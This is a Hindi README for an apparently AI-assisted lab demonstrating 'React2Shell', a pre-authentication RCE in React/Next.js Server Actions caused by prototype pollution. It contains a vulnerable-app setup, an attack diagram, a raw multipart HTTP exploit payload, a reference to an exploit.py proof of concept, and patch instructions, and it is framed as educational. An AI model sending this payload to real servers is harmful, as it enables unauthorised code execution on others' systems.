
CVE-2025-55182 भेद्यता के लिए AI के साथ मिलकर एक नमूना लिखा और परीक्षण किया गया।
उपयोग किया गया AI: Claude Opus 4.5 ⚠️ चेतावनी: यह वातावरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए उपयोग करें।
| आइटम | सामग्री |
|---|---|
| CVE | CVE-2025-55182 (React) / CVE-2025-66478 (Next.js) |
| नाम | React2Shell |
| CVSS | 10.0 (Critical) |
| प्रकार | Pre-Auth Remote Code Execution |
| कारण | Flight प्रोटोकॉल डिसेरियलाइज़ेशन के दौरान प्रोटोटाइप प्रदूषण |
┌─────────────────────────┐
│ Attacker │
└───────────┬─────────────┘
│
POST Request + Next-Action Header
multipart/form-data payload
│
▼
┌───────────────────────────────────────────────────────────┐
│ Next.js Server │
├───────────────────────────────────────────────────────────┤
│ 1. Next-Action हेडर → Server Action ट्रिगर │
│ 2. multipart पेलोड → Flight प्रोटोकॉल डिसेरियलाइज़ेशन │
│ 3. Fake Chunk ऑब्जेक्ट की then() विधि कॉल │
│ 4. __proto__ संदर्भ → प्रोटोटाइप प्रदूषण │
│ 5. Function कंस्ट्रक्टर इंजेक्शन → RCE │
└───────────────────────────────────────────────────────────┘
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="0"
{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"
$@0
------Boundary--
मुख्य तत्व:
Next-Action हेडर से Server Action ट्रिगर करेंthen विधि वाला Fake Chunk$@0 संदर्भ__proto__:then के माध्यम से Function कंस्ट्रक्टर तक पहुंचcd vulnerable-app
# निर्भरताएँ स्थापित करें
npm install
# डेवलपमेंट सर्वर प्रारंभ करें
npm run dev
http://localhost:3000 पर एक्सेस करें
react-rce/
├── README.md
├── vulnerable-app/ # कमजोर Next.js ऐप
│ ├── package.json # Next.js 15.0.3 (कमजोर संस्करण)
│ └── app/
│ ├── page.js # UI (CVE जानकारी + RCE प्रदर्शन)
│ ├── actions.js # Server Actions
│ └── globals.css
└── exploit/ # आक्रमण उपकरण (वैकल्पिक)
└── exploit.py # CVE-2025-55182 PoC
# पैच संस्करण में अपग्रेड करें
npm install [email protected] [email protected] [email protected]